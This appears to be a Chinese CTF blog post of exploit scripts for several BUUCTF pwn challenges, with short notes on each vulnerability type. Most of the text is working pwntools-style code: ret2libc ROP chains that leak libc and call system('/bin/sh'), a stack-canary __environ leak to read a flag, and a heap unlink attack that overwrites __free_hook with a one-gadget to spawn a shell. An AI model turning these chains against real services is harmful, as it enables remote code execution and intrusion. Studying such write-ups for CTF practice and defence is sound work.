rsi_r15_ret = 0x0000000000400961

payload = junk(0xD0+8) + p(rdi_ret)
payload += p(elf.got['puts']) + p(elf.plt['puts'])
payload += p(elf.sym['main'])

sla('tell me:',payload)

ru('Repeater:')
r(0xdb)
puts_addr = u(r_x64())
lgs(hex(puts_addr),'puts_addr')

libc = ELF(local_libc()) # libc-2.23-10.so
libcBase = puts_addr - libc.sym['puts']
tmp = LLSysBin(libc,libcBase)

system_addr = tmp[0]
bin_sh_addr = tmp[1]

lgs(hex(system_addr),'system_addr')
lgs(hex(bin_sh_addr),'bin_sh_addr')
lgs(hex(libcBase),'libcBase')

payload = junk(0xD0+8) + p(rdi_ret)
payload += p(bin_sh_addr) + p(system_addr)
sla('tell me:',payload)

inter()

cmcc_pwnme1

考点

  • stack
  • Ret2text/Ret2libc
1
2
3
4
5
6
7
8
# Exp
## 环境部署问题,无法打通
sl('5')

payload = junk(0xA4+4) + p(elf.sym['getflag'])
sla('fruit:',payload)

inter()
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# Exp-ret2libc
sl('5')

payload = junk(0xA4+4) + p(elf.plt['puts']) + p(elf.sym['getfruit']) + p(elf.got['puts'])
# gdp()
sla('fruit:',payload)
ru('...\n')

puts_addr = u(r_x86())
lgs(hex(puts_addr),'puts_addr')

libc = local_libc() # libc-2.23-11.so
libcBase = puts_addr - libc.sym['puts']
tmp = LLSysBin(libc,libcBase)
system_addr = tmp[0]
bin_sh_addr = tmp[1]
payload = junk(0xA4+4) + p(system_addr) + p(0xdeadbeef) + p(bin_sh_addr)
sl(payload)

inter()

wdb2018_guess

考点

  • stack
  • __stack_chk_fail+__environ
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Exp
payload = junk(0x128) + p(elf.got['puts'])
sl(payload)
ru('*** stack smashing detected ***: ')
puts_addr = u(r_x64())
lgs(hex(puts_addr),'puts_addr')

libc = local_libc() # libc-2.23-10.so
libcBase = puts_addr - libc.sym['puts']
__environ = libcBase + libc.sym['__environ']

lgs(hex(libcBase),'libcBase')
lgs(hex(__environ),'__environ')

payload = junk(0x128) + p(__environ)
sl(payload)
ru('*** stack smashing detected ***: ')
stack_addr = u(r_x64())
lgs(hex(stack_addr),'stack_addr')

flag_addr = stack_addr - 0x168
payload = junk(0x128) + p(flag_addr)
sl(payload)
ru('*** stack smashing detected ***: ')

inter()

护网杯_2018_gettingstart

考点

  • stack
  • 小数的转换
1
2
3
4
5
6
7
8
9
10
# Exp
## v6的值可以在ida里找到
v5 = 0x7FFFFFFFFFFFFFFF
v6 = Decimal2Integer(0.1) # 0x3FB999999999999A

payload = junk(0x18) + p(v5) + p(v6)

sla('on you.',payload)

inter()

axb_2019_heap

考点

  • HEAP
  • PIE
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
# Exp
## __malloc_hook不满足Onegadgets条件
## 调整栈:__realloc_hook存在值,尝试修改成Onegadgets也打不通
## 打__free_hook
def Add(index,size,content):
    sla('>> ',str(1))
    sla('Enter the index you want to create (0-10):',str(index))
    sla('Enter a size:',str(size))
    sla('Enter the content: ',content)

def Edit(index,content):
    sla('>> ',str(4))
    sla('Enter an index:',str(index))
    # sla('size: ',str(size))
    sla('Enter the content: ',content)   

def Show(index):
    sla('>> ',str(3))
    sla('Enter an index:',str(index))

def Del(index):
    sla('>> ',str(2))
    sla('Enter an index:',str(index))


sla('name: ','%11$p%15$p')
ru('Hello, ')

process_base = int(r(7*2),16) & (~0xffff)
lgs(hex(process_base),'process_base')

__libc_start_main = int(r(7*2),16) - 240
lgs(hex(__libc_start_main),'__libc_start_main')

libc = ELF_local_libc() #libc-2.23-11.so
libcBase = __libc_start_main - libc.sym['__libc_start_main']
lgs(hex(libcBase),'libcBase')

Add(0,0x88,'aaaa') # idx = 0
Add(1,0x88,'aaaa') # idx = 1
Add(2,0x88,'aaaa') # idx = 2

note_arrary = process_base + 0x0202060

P = note_arrary + 0x10

P_prev_size = 0
P_size = 0x81
P_fd = P - (0x8 * 3)
P_bk = P - (0x8 * 2)

thunk2_prev_size = P_size - 1
thunk2_size = 0x90

payload = p(P_prev_size) + p(P_size)
payload += p(P_fd) + p(P_bk)
payload += p(0)*12 # 0x60
payload += p(thunk2_prev_size) + p8(thunk2_size)

Edit(1,payload)

key = process_base + 0x0202040
lgs(hex(key),'key')

Del(2)

thunk0_size = 0x88
thunk0 = key

payload = p(0)
payload +=  p(thunk0) + p(thunk0_size)
Edit(1,payload)


payload = p(0x2B) + p(0)*3 + p(note_arrary) + p(0x88)
Edit(0,payload)

one_gadgets = [i+libcBase for i in [0x4526a, 0xf02a4, 0xf1147] ]

__free_hook = libcBase + libc.sym['__free_hook']

thunk0 = __free_hook
payload =  p(thunk0) + p(thunk0_size) 
Edit(0,payload)

payload = p(one_gadgets[0])
Edit(0,payload)

Del(0)

inter()
PWN > BUUCTF
PWN-BUUCTF-3
https://tforevery.github.io/PWN/BUUCTF/PWN-BUUCTF-3/
作者
TY
发布于
2025年12月8日
许可协议